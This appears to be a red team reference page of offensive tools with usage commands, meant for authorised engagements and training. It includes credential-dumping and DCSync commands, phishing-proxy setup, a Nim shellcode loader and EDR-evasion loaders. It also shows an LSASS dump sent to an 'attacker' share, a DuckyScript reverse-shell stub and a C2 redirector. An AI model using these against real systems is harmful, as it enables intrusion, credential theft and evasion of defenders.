Tools & Resources
Red Team Tools & Resources
A well-equipped red team selects tools based on the engagement scope, target environment, and operational security requirements. This reference organizes the essential tools by category, provides usage examples, and includes comparison tables to help practitioners choose the right tool for each phase of an operation.
Navigation: This page serves as a quick-reference companion to the technique-specific pages. See C2 Frameworks for in-depth C2 coverage, AD Attacks for Active Directory tradecraft, Cloud Red Teaming for cloud-specific tooling, and Physical Red Teaming for physical security gear.
1. Reconnaissance Tools
Reconnaissance is the foundation of every engagement. These tools automate the discovery of subdomains, hosts, open ports, email addresses, and organizational relationships.
Amass (OWASP)
The OWASP Amass project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.
# Passive enumeration — no direct contact with target
amass enum -passive -d example.com -o passive_results.txt
# Active enumeration with brute-forcing and DNS resolution
amass enum -active -brute -d example.com -o active_results.txt
# Use specific data sources with API keys configured in config.ini
amass enum -active -d example.com -config ~/.config/amass/config.ini
# Visualize the results
amass viz -d3 -d example.comSubfinder
A fast passive subdomain enumeration tool from ProjectDiscovery. Lightweight, focused, and designed for pipeline integration.
# Basic subdomain enumeration
subfinder -d example.com -o subdomains.txt
# Use all available sources with verbose output
subfinder -d example.com -all -v -o subdomains.txt
# Pipe into httpx for live host validation
subfinder -d example.com -silent | httpx -silent -status-code -titleShodan
The search engine for internet-connected devices. Invaluable for identifying exposed services, default credentials, and vulnerable infrastructure before active scanning.
# Search for an organization's assets
shodan search "org:\"Example Corp\""
# Find specific services on a target network
shodan search "net:203.0.113.0/24 port:443"
# Host lookup for a specific IP
shodan host 203.0.113.50
# Monitor for new exposures
shodan alert create "Example Corp" 203.0.113.0/24Censys
Similar to Shodan but with a focus on certificate transparency and TLS analysis. Excellent for discovering hidden infrastructure through certificate relationships.
# Search via CLI
censys search "services.tls.certificates.leaf.subject.organization:Example"
# Find hosts by certificate fingerprint
censys search "services.tls.certificates.leaf.fingerprint:SHA256_HASH"theHarvester
Gathers emails, names, subdomains, IPs, and URLs from multiple public data sources. A staple for initial OSINT collection.
# Gather emails and subdomains from multiple sources
theHarvester -d example.com -b google,bing,linkedin,dnsdumpster -l 500
# Export results to XML
theHarvester -d example.com -b all -f results.xmlSpiderFoot
An automated OSINT platform that queries over 200 data sources. Runs as a local web application with a powerful correlation engine.
# Start the SpiderFoot web UI
spiderfoot -l 127.0.0.1:5001
# Run a scan from CLI
spiderfoot -s example.com -t INTERNET_NAME,IP_ADDRESS,EMAILADDR -o csvMaltego
A commercial OSINT and graphical link analysis tool. Transforms data from various sources into a visual graph that reveals relationships between entities — domains, IPs, people, social media accounts, and infrastructure.
Recon-ng
A full-featured web reconnaissance framework with independent modules, database interaction, and a built-in reporting engine. Modeled after Metasploit.
# Launch Recon-ng and create a workspace
recon-ng
workspaces create example_engagement
# Install and run modules
marketplace install all
modules load recon/domains-hosts/hackertarget
options set SOURCE example.com
run
# Generate a report
modules load reporting/html
options set FILENAME /tmp/recon_report.html
runRecon Tools Comparison
| Tool | Type | Scope | Output Format | License |
|---|---|---|---|---|
| Amass | Subdomain enum, DNS mapping | Domains, ASNs, networks | TXT, JSON, D3 graph | Apache 2.0 |
| Subfinder | Passive subdomain enum | Subdomains only | TXT, JSON | MIT |
| Shodan | Internet-wide scanning | IPs, services, banners | JSON, API | Commercial (free tier) |
| Censys | Certificate & host search | TLS, hosts, services | JSON, API | Commercial (free tier) |
| theHarvester | Email & subdomain OSINT | Emails, hosts, IPs | TXT, XML | GPL 2.0 |
| SpiderFoot | Automated OSINT platform | 200+ data source types | CSV, JSON, web UI | MIT |
| Maltego | Visual link analysis | Entities & relationships | Graph, reports | Commercial (CE free) |
| Recon-ng | Modular recon framework | Flexible via modules | HTML, CSV, JSON | GPL 3.0 |
2. Phishing & Social Engineering Tools
Phishing remains one of the most effective initial access vectors. These tools help red teams build realistic campaigns, capture credentials, and bypass multi-factor authentication.
GoPhish
An open-source phishing framework that provides a web-based management interface for building and tracking phishing campaigns.
# Start GoPhish (default admin panel on port 3333)
./gophish
# Key workflow:
# 1. Configure Sending Profile (SMTP settings)
# 2. Create Email Template (HTML with tracking)
# 3. Build Landing Page (credential capture form)
# 4. Define User Group (target email list)
# 5. Launch Campaign and monitor results dashboardKing Phisher
A phishing campaign toolkit with a client-server architecture. Supports Jinja2 templates, SMS phishing, and two-factor authentication token harvesting.
# Start the King Phisher server
king-phisher-server -c /etc/king-phisher/server_config.yml
# Connect via the client GUI
king-phisher-clientEvilginx2
A man-in-the-middle attack framework for phishing credentials together with session cookies, bypassing two-factor authentication. Uses a custom reverse proxy engine.
# Start Evilginx2
evilginx2 -p /usr/share/evilginx/phishlets
# Configure a phishlet (e.g., Microsoft 365)
config domain red.example.com
config ipv4 203.0.113.10
phishlets hostname o365 login.red.example.com
phishlets enable o365
# Create a lure URL
lures create o365
lures get-url 0Modlishka
A flexible HTTP reverse proxy that automates phishing with real-time credential and 2FA token interception. Sits transparently between the victim and the legitimate site.
EvilnoVNC
Combines noVNC (browser-based VNC) with phishing to present victims with a real browser session running on the attacker’s server. The victim interacts with a legitimate site through the attacker’s controlled browser, capturing all input including MFA tokens and session state.
SET (Social Engineering Toolkit)
One of the original social engineering frameworks. Supports spear-phishing, web attack vectors, USB HID attacks, and payload generation.
# Launch SET
setoolkit
# Common attack paths:
# 1) Social-Engineering Attacks -> Website Attack Vectors -> Credential Harvester
# 2) Social-Engineering Attacks -> Spear-Phishing Attack Vectors
# 3) Social-Engineering Attacks -> Infectious Media GeneratorPhishing Tools Comparison
| Tool | MFA Bypass | Credential Capture | Campaign Mgmt | Deployment | License |
|---|---|---|---|---|---|
| GoPhish | No | Yes | Full dashboard | Self-hosted | MIT |
| King Phisher | Limited | Yes | Client/Server | Self-hosted | BSD |
| Evilginx2 | Yes (session hijack) | Yes | CLI-based | Self-hosted | GPL 3.0 |
| Modlishka | Yes (reverse proxy) | Yes | Minimal | Self-hosted | GPL 3.0 |
| EvilnoVNC | Yes (real browser) | Yes | Minimal | Docker | MIT |
| SET | No | Yes | CLI wizard | Local | GPL 3.0 |
3. Command & Control (C2) Frameworks
C2 frameworks provide the backbone for managing implants, executing post-exploitation tasks, and maintaining persistent access. For detailed coverage, see C2 Frameworks.
Framework Overview
| Framework | Language | Implant Languages | GUI | Team Server | License |
|---|---|---|---|---|---|
| Cobalt Strike | Java | C (Beacon) | Yes | Yes | Commercial |
| Mythic | Go/Python | C, C#, Python, Go, etc. | Web UI | Docker | BSD 3-Clause |
| Sliver | Go | Go (cross-platform) | CLI + Web | Built-in | GPL 3.0 |
| Havoc | C/C++ | C (Demon) | Qt GUI | Yes | GPL 3.0 |
| Brute Ratel C4 | C/C++ | C (Badger) | Electron | Yes | Commercial |
| PoshC2 | Python | PowerShell, C#, Python | Web UI | Yes | BSD 3-Clause |
| Covenant | C# | C# (Grunt) | Web UI | Built-in | GPL 3.0 |
| Merlin | Go | Go (cross-platform) | CLI | Built-in | GPL 3.0 |
# Sliver — quick start
sliver-server # Start the server
# Generate an implant
generate --mtls 10.10.10.1 --os windows --arch amd64 --save /tmp/implant.exe
# Start a listener
mtls --lhost 10.10.10.1 --lport 8888
# Mythic — Docker deployment
cd Mythic
sudo ./mythic-cli install github https://github.com/MythicAgents/apollo.git
sudo ./mythic-cli start4. Post-Exploitation Tools
Once initial access is achieved, post-exploitation tools enable credential harvesting, privilege escalation, lateral movement, and data exfiltration. Many of these are referenced in AD Attacks.
Mimikatz
The de facto standard for Windows credential extraction. Dumps plaintext passwords, hashes, Kerberos tickets, and PIN codes from memory.
# Dump credentials from LSASS
privilege::debug
sekurlsa::logonpasswords
# Extract Kerberos tickets
sekurlsa::tickets /export
# Perform a Pass-the-Hash attack
sekurlsa::pth /user:admin /domain:corp.local /ntlm:HASH_HERE
# DCSync attack — replicate credentials from DC
lsadump::dcsync /domain:corp.local /user:krbtgtRubeus
A C# toolset for raw Kerberos interaction and abuses — Kerberoasting, AS-REP Roasting, ticket manipulation, and constrained delegation attacks.
# Kerberoast all service accounts
Rubeus.exe kerberoast /outfile:hashes.txt
# AS-REP Roast accounts without pre-authentication
Rubeus.exe asreproast /format:hashcat /outfile:asrep_hashes.txt
# Request a TGT with a known hash (Overpass-the-Hash)
Rubeus.exe asktgt /user:admin /rc4:NTLM_HASH /ptt
# Monitor for new TGTs (ticket monitoring)
Rubeus.exe monitor /interval:30Seatbelt
A C# “safety check” tool that performs host-survey security checks. Collects system data relevant to both offensive and defensive operations.
# Run all checks
Seatbelt.exe -group=all
# Target specific checks
Seatbelt.exe -group=user -group=system
# Remote execution
Seatbelt.exe -group=remote -computername=DC01.corp.localSharpUp
A C# port of PowerUp, checking for common Windows privilege escalation vectors — modifiable services, unquoted service paths, AlwaysInstallElevated, and more.
# Run all privilege escalation checks
SharpUp.exe audit
# Check specific vectors
SharpUp.exe ModifiableServices
SharpUp.exe UnquotedServicePathSharpHound / BloodHound
SharpHound is the official data collector for BloodHound. It enumerates Active Directory relationships including group memberships, sessions, ACLs, and trust relationships. See the dedicated section below and AD Attacks.
# Collect all AD data
SharpHound.exe -c All --zipfilename bloodhound_data.zip
# Stealth collection (no noisy session enum)
SharpHound.exe -c DCOnly --stealth
# Loop collection for session data over time
SharpHound.exe -c Session --loop --loopduration 02:00:00PowerView
A PowerShell tool for Active Directory situational awareness. Part of PowerSploit, it provides functions for domain enumeration, trust mapping, and ACL analysis.
# Import and enumerate domain
Import-Module PowerView.ps1
# Find domain admins
Get-DomainGroupMember -Identity "Domain Admins" -Recurse
# Find computers with unconstrained delegation
Get-DomainComputer -Unconstrained
# Enumerate ACLs for a specific user
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "targetuser"}
# Find shares
Find-DomainShare -CheckShareAccessCrackMapExec / NetExec
A Swiss army knife for pentesting networks. Supports SMB, WinRM, LDAP, MSSQL, SSH, and more. NetExec is the actively maintained community fork.
# Spray credentials across a subnet
nxc smb 10.10.10.0/24 -u admin -p 'Password123' --continue-on-success
# Dump SAM hashes from a compromised host
nxc smb 10.10.10.5 -u admin -p 'Password123' --sam
# Execute commands remotely
nxc smb 10.10.10.5 -u admin -p 'Password123' -x 'whoami /all'
# Enumerate shares across the domain
nxc smb 10.10.10.0/24 -u admin -p 'Password123' --shares
# Check for LAPS passwords
nxc ldap dc01.corp.local -u admin -p 'Password123' --lapsEvil-WinRM
A WinRM shell for offensive use. Supports pass-the-hash, file upload/download, and loading PowerShell/C# assemblies in memory.
# Connect with credentials
evil-winrm -i 10.10.10.5 -u admin -p 'Password123'
# Connect with NTLM hash
evil-winrm -i 10.10.10.5 -u admin -H NTLM_HASH
# Load PowerShell scripts and C# binaries in-memory
evil-winrm -i 10.10.10.5 -u admin -p 'Pass' -s /opt/scripts/ -e /opt/binaries/Impacket Suite
A collection of Python classes for working with network protocols. Essential for attacking Windows environments from Linux.
# Obtain a TGT via AS-REQ
impacket-getTGT corp.local/user:'Password123' -dc-ip 10.10.10.1
# Kerberoasting
impacket-GetUserSPNs corp.local/user:'Password123' -dc-ip 10.10.10.1 -request
# DCSync from Linux
impacket-secretsdump corp.local/admin:'Password123'@10.10.10.1
# Remote command execution
impacket-psexec corp.local/admin:'Password123'@10.10.10.5
impacket-wmiexec corp.local/admin:'Password123'@10.10.10.5
impacket-smbexec corp.local/admin:'Password123'@10.10.10.5
# Silver ticket creation
impacket-ticketer -nthash SVC_HASH -domain-sid S-1-5-21-... -domain corp.local -spn MSSQL/db01.corp.local adminPost-Exploitation Tools Comparison
| Tool | Language | Platform | Key Feature |
|---|---|---|---|
| Mimikatz | C | Windows | Credential extraction from LSASS |
| Rubeus | C# | Windows | Kerberos ticket manipulation |
| Seatbelt | C# | Windows | Host security survey |
| SharpUp | C# | Windows | Privilege escalation enumeration |
| SharpHound | C# | Windows | AD relationship collection |
| PowerView | PowerShell | Windows | AD enumeration & situational awareness |
| ADModule | PowerShell | Windows | Microsoft-signed AD enumeration |
| CrackMapExec/NetExec | Python | Cross-platform | Multi-protocol network pentesting |
| Evil-WinRM | Ruby | Cross-platform | Offensive WinRM shell |
| Impacket | Python | Cross-platform | Windows protocol attacks from Linux |
5. Active Directory Tools
Active Directory is the backbone of most enterprise environments and the primary target for red team operations. These tools focus specifically on AD enumeration, attack path discovery, and exploitation. For technique details see AD Attacks.
BloodHound Community Edition
The gold standard for AD attack path analysis. BloodHound CE features a modernized web interface, a PostgreSQL backend, improved data collection via SharpHound and AzureHound, and built-in Cypher queries for discovering privilege escalation paths.
# Deploy BloodHound CE with Docker
curl -L https://ghst.ly/getbhce | docker compose -f - up
# Access the web UI at https://localhost:8080
# Upload SharpHound ZIP data via the UI
# Example Cypher query — shortest path to Domain Admin
MATCH p=shortestPath((u:User {name:"OWNED_USER@CORP.LOCAL"})-[*1..]->(g:Group {name:"DOMAIN ADMINS@CORP.LOCAL"})) RETURN pCertipy
A Python tool for enumerating and abusing Active Directory Certificate Services (AD CS). Identifies vulnerable certificate templates and performs certificate-based attacks.
# Enumerate vulnerable certificate templates
certipy find -u user@corp.local -p 'Password123' -dc-ip 10.10.10.1 -vulnerable
# ESC1 — request a certificate as another user
certipy req -u user@corp.local -p 'Password123' -ca CORP-CA -template VulnTemplate -upn admin@corp.local
# Authenticate with a certificate
certipy auth -pfx admin.pfx -dc-ip 10.10.10.1Certify
A C# tool (from GhostPack) for enumerating and abusing AD CS misconfigurations from a Windows host.
# Find vulnerable certificate templates
Certify.exe find /vulnerable
# Request a certificate with an alternate subject name
Certify.exe request /ca:dc01.corp.local\CORP-CA /template:VulnTemplate /altname:adminADRecon
An Active Directory reconnaissance tool that generates comprehensive Excel reports of the AD environment — users, groups, computers, GPOs, trusts, and more.
# Run a full AD recon and generate Excel report
.\ADRecon.ps1 -OutputType XLSX
# Target a specific domain
.\ADRecon.ps1 -DomainController dc01.corp.local -Credential (Get-Credential)PingCastle
An AD security assessment tool that generates a health score and identifies critical vulnerabilities, misconfigurations, and attack paths. Commonly used by both red and blue teams.
# Run a health check
PingCastle.exe --healthcheck --server dc01.corp.local
# Generate a full report
PingCastle.exe --healthcheck --server dc01.corp.local --level FullPurple Knight
A community tool from Semperis for AD security assessments. Runs over 150 security indicators across categories including account security, AD delegation, Group Policy, Kerberos, and AD infrastructure.
ldapdomaindump
A lightweight Python tool that dumps AD information via LDAP into HTML, JSON, and greppable formats.
# Dump domain info
ldapdomaindump -u 'corp.local\user' -p 'Password123' 10.10.10.1 -o /tmp/ldap_dump/
# Output includes: domain_users.html, domain_groups.html, domain_computers.html, etc.Active Directory Tools Comparison
| Tool | Language | Purpose | Output | License |
|---|---|---|---|---|
| BloodHound CE | Go/JS | Attack path analysis | Web UI, Cypher | Apache 2.0 |
| Certipy | Python | AD CS attacks (Linux) | PFX, TXT | MIT |
| Certify | C# | AD CS attacks (Windows) | Certificate files | BSD 3-Clause |
| PowerView | PowerShell | AD enumeration | Console, objects | BSD 3-Clause |
| ADRecon | PowerShell | AD reporting | Excel, CSV | GPL 3.0 |
| PingCastle | C# | AD health assessment | HTML report | Proprietary (free) |
| Purple Knight | C# | AD security indicators | HTML report | Proprietary (free) |
| ldapdomaindump | Python | LDAP data dump | HTML, JSON, grep | MIT |
6. Cloud Tools
Modern enterprises run hybrid environments, making cloud attack capabilities essential. These tools target AWS, Azure, GCP, and multi-cloud infrastructure. For detailed techniques, see Cloud Red Teaming.
Pacu (AWS)
The AWS exploitation framework, similar to Metasploit but for Amazon Web Services. Modular design with modules for enumeration, privilege escalation, data exfiltration, and persistence.
# Start Pacu and create a session
pacu
set_keys # Enter AWS access keys
# Enumerate the environment
run iam__enum_permissions
run iam__enum_users_roles_policies_groups
run ec2__enum
# Check for privilege escalation paths
run iam__privesc_scan
# Attempt privilege escalation
run iam__privesc_scan --method AttachUserPolicyScoutSuite (Multi-Cloud)
A multi-cloud security auditing tool that creates a comprehensive point-in-time report of an environment’s security posture. Supports AWS, Azure, GCP, Alibaba Cloud, and Oracle Cloud.
# AWS audit
scout aws --profile target-profile
# Azure audit
scout azure --cli
# GCP audit
scout gcp --user-account --project-id target-project
# Output: HTML dashboard with findings organized by serviceProwler (AWS/Azure/GCP)
A security assessment tool focused on best practices and compliance (CIS, NIST, GDPR, HIPAA). Generates detailed findings with remediation guidance.
# Full AWS assessment
prowler aws
# Specific checks
prowler aws --checks iam_password_policy_minimum_length_14 s3_bucket_public_access
# Azure assessment
prowler azure --subscription-ids SUBSCRIPTION_ID
# Output as CSV for further analysis
prowler aws --output-modes csvROADtools (Azure AD)
A framework for interacting with Azure AD, consisting of ROADrecon (data gathering) and ROADlib (library). Provides a powerful web interface for exploring Azure AD objects and relationships.
# Authenticate and gather data
roadrecon auth -u user@example.com -p 'Password123'
roadrecon gather
# Start the exploration UI
roadrecon gui
# Dump all Azure AD data
roadrecon dumpAzureHound
The Azure data collector for BloodHound CE. Enumerates Azure AD and Azure Resource Manager objects, mapping attack paths across cloud and hybrid environments.
# Collect Azure data for BloodHound
azurehound list -u user@example.com -p 'Password123' -t example.onmicrosoft.com -o azurehound_data.json
# Use refresh token
azurehound list --refresh-token TOKEN -t example.onmicrosoft.com -o output.jsonAADInternals
A PowerShell module for Azure AD and Microsoft 365 administration, reconnaissance, and attacks. Covers everything from password spraying to token manipulation and tenant takeover.
# Import and authenticate
Import-Module AADInternals
$token = Get-AADIntAccessTokenForAzureCoreManagement
# Enumerate tenant information
Get-AADIntTenantDetails
Get-AADIntUsers
Get-AADIntServicePrincipals
# Export Azure AD configuration
Invoke-AADIntReconAsInsider
# Manipulate tokens
Get-AADIntAccessTokenForMSGraphCloudFox
A tool for finding exploitable attack paths in cloud infrastructure. Enumerates cloud resources, permissions, and trust relationships across AWS and Azure.
# Enumerate AWS attack paths
cloudfox aws --profile target-profile all-checks
# Specific enumeration
cloudfox aws --profile target-profile permissions
cloudfox aws --profile target-profile instances
cloudfox aws --profile target-profile secretsSteampipe
An open-source tool for querying cloud APIs using SQL. Provides a unified interface for querying AWS, Azure, GCP, and hundreds of other services.
# Query AWS for public S3 buckets
steampipe query "SELECT name, acl FROM aws_s3_bucket WHERE acl = 'public-read'"
# Find IAM users without MFA
steampipe query "SELECT user_name FROM aws_iam_user WHERE mfa_enabled = false"
# Check for Azure VMs with public IPs
steampipe query "SELECT name, public_ips FROM azure_compute_virtual_machine WHERE public_ips IS NOT NULL"Cloud Tools Comparison
| Tool | Cloud Provider | Purpose | License |
|---|---|---|---|
| Pacu | AWS | Exploitation framework | BSD 3-Clause |
| ScoutSuite | AWS, Azure, GCP, OCI, Ali | Security auditing | GPL 2.0 |
| Prowler | AWS, Azure, GCP | Compliance & best practices | Apache 2.0 |
| ROADtools | Azure AD | Azure AD reconnaissance | MIT |
| AzureHound | Azure | Attack path collection | GPL 3.0 |
| AADInternals | Azure AD / M365 | Azure AD attacks & admin | MIT |
| CloudFox | AWS, Azure | Attack path discovery | Apache 2.0 |
| Steampipe | Multi-cloud (200+ plugins) | SQL-based cloud queries | AGPL 3.0 |
7. Evasion & Payload Tools
Modern defenses require sophisticated evasion techniques. These tools help red teams generate payloads, bypass EDR, and avoid detection.
ScareCrow
A payload creation framework that produces loaders using side-loading (DLL hijacking) and direct syscalls to bypass EDR/AV. Uses code signing with legitimate (revoked or expired) certificates for process trust.
# Generate a loader for a Cobalt Strike shellcode
ScareCrow -I beacon.bin -Loader dll -domain microsoft.com
# Generate with a specific process injection technique
ScareCrow -I beacon.bin -Loader binary -injection process -domain google.com
# Use a custom encryption method
ScareCrow -I beacon.bin -Loader control -encryptionmode ELZMA -domain microsoft.comNim-Based Loaders
Nim is increasingly popular for offensive tooling because it compiles to native code, has low detection rates, and supports cross-compilation. Common projects include NimHollow, OffensiveNim, and NimPackt.
# Example: basic shellcode loader in Nim
import winim
proc main() =
let shellcode: array[SHELLCODE_SIZE, byte] = [byte 0xfc, 0x48, ...]
let mem = VirtualAlloc(nil, shellcode.len, MEM_COMMIT, PAGE_EXECUTE_READWRITE)
copyMem(mem, unsafeAddr shellcode[0], shellcode.len)
let thread = CreateThread(nil, 0, cast[LPTHREAD_START_ROUTINE](mem), nil, 0, nil)
WaitForSingleObject(thread, INFINITE)
main()Donut
A shellcode generation tool that converts .NET assemblies, PE files, VBScript, and JScript into position-independent shellcode. Enables in-memory execution of arbitrary payloads.
# Convert a .NET assembly to shellcode
donut -i SharpHound.exe -o loader.bin
# With encryption and specific runtime version
donut -i Rubeus.exe -o rubeus.bin -e 3 -z 2 -f 1
# Generate shellcode for a specific class and method
donut -i CustomTool.dll -c Namespace.Class -m Execute -o custom.binSysWhispers3
Generates header/ASM files for direct system calls, allowing red team tools to bypass user-mode API hooking used by EDR products.
# Generate syscall stubs for specific functions
python syswhispers.py -a x64 -f NtAllocateVirtualMemory,NtProtectVirtualMemory,NtCreateThreadEx -o syscalls
# Use jumper method (indirect syscalls) for better evasion
python syswhispers.py -a x64 --function-names All -o syscalls -m jumperNanoDump
A tool for dumping LSASS process memory using syscalls and an invalid dump signature to avoid detection. Smaller footprint than most credential dumpers.
# Dump LSASS via direct syscalls (avoids API hooking)
nanodump --write C:\Temp\dump.dmp
# Use a fork of LSASS to avoid detection
nanodump --fork --write C:\Temp\dump.dmp
# Dump to an SMB share
nanodump --write \\attacker\share\dump.dmpCallbackHell
Leverages Windows callback functions for shellcode execution, providing an alternative to common injection techniques like CreateThread and APC injection that are heavily monitored by EDRs.
SharpUnhooker
A C# tool that removes EDR hooks from ntdll.dll by replacing the hooked version with a clean copy from disk or from a suspended process, restoring original system call functionality.
Evasion Tools Comparison
| Tool | Language | Purpose | Technique |
|---|---|---|---|
| ScareCrow | Go | Loader generation | DLL side-loading, code signing |
| Nim loaders | Nim | Custom payloads | Native compilation, low detection |
| Donut | C | .NET-to-shellcode | Position-independent shellcode |
| SysWhispers3 | Python/ASM | Syscall generation | Direct/indirect syscalls |
| NanoDump | C | LSASS dumping | Syscalls, invalid signatures |
| CallbackHell | C/C++ | Shellcode execution | Windows callback abuse |
| SharpUnhooker | C# | EDR bypass | ntdll.dll unhooking |
8. Physical Security Tools
Physical security testing requires specialized hardware. These tools are essential for assessments involving building access, wireless networks, and hardware implants. See Physical Red Teaming for engagement methodology.
Proxmark3 RDV4
The premier RFID research and cloning device. Reads, emulates, and clones low-frequency (125 kHz) and high-frequency (13.56 MHz) RFID cards including HID, MIFARE, iCLASS, and DESFire.
# Read an unknown card
hf search
lf search
# Clone an HID Prox card
lf hid read # Read the original
lf hid clone -w H10301 --fc 42 --cn 12345 # Clone to T5577
# Sniff card data from a reader
hf 14a sniffFlipper Zero
A portable multi-tool for hardware security research. Combines sub-GHz radio, RFID/NFC, infrared, GPIO, and USB HID capabilities in a pocket-sized device with a playful dolphin interface.
WiFi Pineapple (Hak5)
A wireless auditing platform for man-in-the-middle attacks, rogue access point deployments, and wireless reconnaissance. Features a web-based management interface and modular architecture.
LAN Turtle (Hak5)
A covert network implant disguised as a USB Ethernet adapter. Provides remote access, man-in-the-middle capabilities, and network reconnaissance via a cellular or reverse SSH connection.
USB Rubber Ducky (Hak5)
A keystroke injection tool that appears as a standard USB keyboard. Executes pre-programmed DuckyScript payloads at superhuman typing speeds for rapid payload delivery.
REM Example DuckyScript payload — reverse shell
DELAY 1000
GUI r
DELAY 500
STRING powershell -w hidden -e BASE64_ENCODED_PAYLOAD
ENTERBash Bunny (Hak5)
An advanced USB attack platform that can emulate multiple USB devices simultaneously — keyboard, storage, network adapter — enabling complex multi-stage attack payloads.
O.MG Cable
A malicious USB cable with an embedded wireless implant. Looks and functions like a normal charging cable while providing remote keystroke injection, keylogging, and payload triggering capabilities.
HackRF One
A software-defined radio (SDR) platform covering 1 MHz to 6 GHz. Used for wireless signal analysis, replay attacks, and testing RF security of wireless systems.
Lock Pick Sets
Professional-grade lock pick sets, tension wrenches, and bypass tools remain fundamental for physical penetration testing. Common brands include Sparrows, Peterson, and Toool.
Physical Security Tools Comparison
| Tool | Category | Primary Use | Connectivity | Approx. Price |
|---|---|---|---|---|
| Proxmark3 RDV4 | RFID/NFC | Card cloning & research | USB, Bluetooth | $300-350 |
| Flipper Zero | Multi-tool | Sub-GHz, RFID, IR, GPIO | USB, Bluetooth, WiFi | $170 |
| WiFi Pineapple | Wireless | Rogue AP, MITM | WiFi, USB | $100-200 |
| LAN Turtle | Network implant | Covert remote access | Ethernet, USB | $60 |
| Rubber Ducky | USB HID | Keystroke injection | USB | $80 |
| Bash Bunny | USB multi-tool | Multi-device emulation | USB | $100 |
| O.MG Cable | USB implant | Remote keystroke injection | WiFi | $120-180 |
| HackRF One | SDR | RF signal analysis | USB | $300-350 |
| Lock pick set | Physical bypass | Lock manipulation | N/A | $30-150 |
9. Infrastructure & Automation
Red team infrastructure must be resilient, attributable only to the cover identity, and quickly deployable. Infrastructure-as-code tools make this repeatable and disposable.
Terraform for Red Team Infrastructure
Terraform enables red teams to define their entire attack infrastructure — redirectors, C2 servers, phishing platforms, and DNS configurations — as code that can be deployed in minutes and torn down without a trace.
# Example: Deploy a Cobalt Strike redirector on AWS
resource "aws_instance" "redirector" {
ami = "ami-0abcdef1234567890"
instance_type = "t3.micro"
key_name = var.ssh_key_name
tags = {
Name = "cdn-node-01" # Blend with legitimate naming
}
user_data = <<-EOF
#!/bin/bash
apt-get update && apt-get install -y socat
socat TCP4-LISTEN:443,fork TCP4:${var.c2_server_ip}:443 &
EOF
}
resource "aws_route53_record" "redirector_dns" {
zone_id = var.hosted_zone_id
name = "cdn.${var.domain}"
type = "A"
ttl = 300
records = [aws_instance.redirector.public_ip]
}Ansible for Configuration Management
Ansible automates the configuration of C2 servers, redirectors, and phishing infrastructure. Playbooks ensure consistent setup across all team infrastructure.
# Example: Configure an HTTPS redirector
- hosts: redirectors
tasks:
- name: Install Apache
apt:
name: apache2
state: present
- name: Enable required modules
apache2_module:
name: "{{ item }}"
state: present
loop: [rewrite, proxy, proxy_http, ssl, headers]
- name: Deploy redirect rules
template:
src: templates/htaccess.j2
dest: /var/www/html/.htaccess
- name: Deploy SSL certificate
copy:
src: "files/{{ inventory_hostname }}.pem"
dest: /etc/ssl/certs/server.pemRed Team Infrastructure Wiki
A community-maintained knowledge base documenting red team infrastructure design patterns, including redirector configurations, domain categorization techniques, certificate management, and OPSEC considerations. Available on GitHub and widely referenced by practitioners.
Mythic Docker Deployment
Mythic’s Docker-based architecture simplifies deployment and makes the C2 framework portable and disposable. Agents, C2 profiles, and the Mythic server all run as containers.
# Clone and deploy Mythic
git clone https://github.com/its-a-feature/Mythic.git
cd Mythic
sudo ./mythic-cli install github https://github.com/MythicAgents/apollo.git
sudo ./mythic-cli install github https://github.com/MythicC2Profiles/http.git
sudo ./mythic-cli start
# Access Mythic at https://localhost:7443cs2modrewrite
A tool that converts Cobalt Strike Malleable C2 profiles into Apache mod_rewrite rules for HTTPS redirectors. Ensures that only valid Beacon traffic reaches the C2 server while all other requests are redirected to a legitimate site.
# Generate Apache rewrite rules from a Malleable C2 profile
python3 cs2modrewrite.py -i malleable.profile -c https://c2.internal.example.com -d https://www.legitimate-site.com -o htaccess_rules.txt10. Training Labs & Platforms
Hands-on practice is essential for developing and maintaining red team skills. These platforms provide realistic environments for training.
HackTheBox
The industry-leading platform for offensive security training. Pro Labs provide multi-machine enterprise environments that simulate real-world networks.
| Lab | Focus | Difficulty | Machines |
|---|---|---|---|
| Offshore | AD exploitation, pivoting | Intermediate | 17+ |
| RastaLabs | Red team simulation, AD | Advanced | 15+ |
| Cybernetics | Enterprise environment, stealth | Advanced | 20+ |
| APTLabs | APT simulation, multi-forest AD | Expert | 25+ |
TryHackMe
A guided learning platform with structured paths. The Red Team learning path covers the full attack lifecycle from initial access to post-exploitation.
Key rooms in the Red Team path include: Red Team Fundamentals, Red Team Recon, Weaponization, Password Attacks, Lateral Movement, and Data Exfiltration.
PentesterLab
Focused on web application security with exercises covering everything from SQL injection basics to advanced deserialization and OAuth attacks. Each exercise includes a detailed explanation of the vulnerability.
Offensive Security Labs
The labs accompanying OSCP, OSEP, OSED, and OSWE certifications. Provide hands-on practice with realistic enterprise networks and require students to demonstrate methodology and reporting skills.
Local AD Lab Environments
For self-hosted practice, several projects automate the deployment of vulnerable Active Directory environments:
| Project | Description | Deployment |
|---|---|---|
| DVAD (Damn Vulnerable AD) | Intentionally misconfigured AD environment | PowerShell scripts |
| GOAD (Game of AD) | Multi-domain, multi-forest AD lab with various attack paths | Vagrant, Terraform, Ansible |
| DetectionLab | Defensive-focused lab with logging and monitoring | Vagrant, Packer |
| PurpleCloud | Azure-based AD lab for purple team exercises | Terraform |
# Deploy GOAD lab
git clone https://github.com/Orange-Cyberdefense/GOAD.git
cd GOAD
# Edit goad.ini for your environment
vagrant up # or use the Terraform/Ansible method
# Deploy PurpleCloud
git clone https://github.com/iknowjason/PurpleCloud.git
cd PurpleCloud
terraform init
terraform apply11. Key Books & Blogs
Essential Books
| Book | Author(s) | Focus |
|---|---|---|
| Red Team Development and Operations | Joe Vest, James Tubberville | Red team program management, engagement planning, tradecraft |
| The Hacker Playbook 3 | Peter Kim | Practical penetration testing methodology and tools |
| Adversarial Tradecraft in Cybersecurity | Dan Borges | Offense and defense techniques, detection evasion |
| Attacking and Defending Active Directory | Sean Metcalf (ADSecurity.org) | Comprehensive AD attack/defense guide |
| Operator Handbook | Netmux | Quick-reference for red/blue team commands and tools |
| Red Team Field Manual (RTFM) | Ben Clark | Concise command reference for penetration testers |
| Evading EDR | Matt Hand | Understanding and bypassing endpoint detection |
| Hacking: The Art of Exploitation | Jon Erickson | Low-level exploitation fundamentals |
Essential Blogs & Resources
| Blog / Resource | Author(s) | Focus |
|---|---|---|
| SpecterOps Blog | SpecterOps team | BloodHound, AD attacks, tradecraft |
| TrustedSec Blog | TrustedSec team | Red team techniques, tool releases |
